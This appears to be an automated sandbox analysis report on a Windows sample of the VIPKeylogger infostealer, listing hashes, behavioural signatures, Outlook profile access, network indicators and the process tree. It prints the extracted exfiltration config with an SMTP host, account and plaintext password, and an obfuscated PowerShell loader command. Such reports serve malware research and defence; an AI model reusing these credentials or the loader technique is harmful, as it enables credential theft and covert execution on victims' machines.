Analysis
-
max time kernel
144s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-01-2025 06:05
Static task
static1
Behavioral task
behavioral1
Sample
fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe
Resource
win10v2004-20241007-en
General
-
Target
fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe
-
Size
806KB
-
MD5
6a5b8c6057dff681139fd609ffc6b21d
-
SHA1
b37b7a2168980b4772978a640ebf5a02f41697e6
-
SHA256
fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41
-
SHA512
0be9c3e2e42b53ac22237f9b2a1037ca4bb46ce908df0bdbe455eb1daf41457b6dd85f1d80aee36f47fa3c6d9cf9d3a9e8867928242edf8a93aae21aa703f989
-
SSDEEP
12288:wTJidkhIqHdLcMMEbtx0GA72BzYCqqykD0AarMhiNAgZY8i3oXRKQCzcdYSS:wTkQIwL81IBUCqpqrsfZV+ER/c
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
55#cHsR%iCPw - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 23 2200 msiexec.exe 25 2200 msiexec.exe 27 2200 msiexec.exe 29 2200 msiexec.exe 31 2200 msiexec.exe 38 2200 msiexec.exe 47 2200 msiexec.exe 54 2200 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 drive.google.com 23 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 37 checkip.dyndns.org 46 reallyfreegeoip.org 47 reallyfreegeoip.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\telectrograph\assimilationer.Qua fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2200 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2544 powershell.exe 2200 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\intercepter.mos fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe -
pid Process 2544 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2200 msiexec.exe 2200 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2544 powershell.exe Token: SeIncreaseQuotaPrivilege 2544 powershell.exe Token: SeSecurityPrivilege 2544 powershell.exe Token: SeTakeOwnershipPrivilege 2544 powershell.exe Token: SeLoadDriverPrivilege 2544 powershell.exe Token: SeSystemProfilePrivilege 2544 powershell.exe Token: SeSystemtimePrivilege 2544 powershell.exe Token: SeProfSingleProcessPrivilege 2544 powershell.exe Token: SeIncBasePriorityPrivilege 2544 powershell.exe Token: SeCreatePagefilePrivilege 2544 powershell.exe Token: SeBackupPrivilege 2544 powershell.exe Token: SeRestorePrivilege 2544 powershell.exe Token: SeShutdownPrivilege 2544 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeSystemEnvironmentPrivilege 2544 powershell.exe Token: SeRemoteShutdownPrivilege 2544 powershell.exe Token: SeUndockPrivilege 2544 powershell.exe Token: SeManageVolumePrivilege 2544 powershell.exe Token: 33 2544 powershell.exe Token: 34 2544 powershell.exe Token: 35 2544 powershell.exe Token: 36 2544 powershell.exe Token: SeDebugPrivilege 2200 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 5072 wrote to memory of 2544 5072 fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe 90 PID 5072 wrote to memory of 2544 5072 fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe 90 PID 5072 wrote to memory of 2544 5072 fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe 90 PID 2544 wrote to memory of 2200 2544 powershell.exe 96 PID 2544 wrote to memory of 2200 2544 powershell.exe 96 PID 2544 wrote to memory of 2200 2544 powershell.exe 96 PID 2544 wrote to memory of 2200 2544 powershell.exe 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe"C:\Users\Admin\AppData\Local\Temp\fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2200
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
277KB
MD53ec09ce77d7046b1b0a4108ea6aac00d
SHA185201f8d4ee3dc202574b7ee39ad232503a39eb2
SHA2561e5a50c09ca254dc572c08bc87f596ebf2ae2ccb09ef355bd34a1a7a2b4e1bef
SHA512bd36a6120c32cce182a44493afdaec571080cab9668fb80ec84dbb3c55e0b50cf631dba68617c29cd1ae9b9c61a6947df157a558e110d0782d73b469aaade39d
-
Filesize
70KB
MD57616ce045d0e4f80b84ca85f265f7588
SHA1f85246dcd0a361746b9fa86a4a78f4424fdecdf8
SHA2563d5c18f1bc08fe7db0aa8650c0342ff90d588afd0b71b0091228860677ecc010
SHA5121b6cabf4063eb02503f2ffdecfd5318be2bde51e0b0f6b1caee7ea09525f4063d6d4231f0015a09985c83db1729ad627c76f7fdf40807ab30883e4ad24b13a34